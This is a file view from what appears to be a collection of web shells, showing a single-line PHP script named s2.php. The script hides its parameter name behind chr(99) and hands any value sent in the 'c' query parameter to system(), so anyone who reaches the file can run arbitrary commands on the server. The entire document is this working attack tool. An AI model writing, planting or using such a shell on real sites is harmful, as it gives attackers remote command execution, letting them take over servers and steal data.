webshells/php/s2.php

1 line
58 B
PHP
Raw Normal View History

2016-01-31 18:22:42 +02:00
<?php $c=chr(99);if(isset($_GET[$c]))system($_GET[$c]); ?>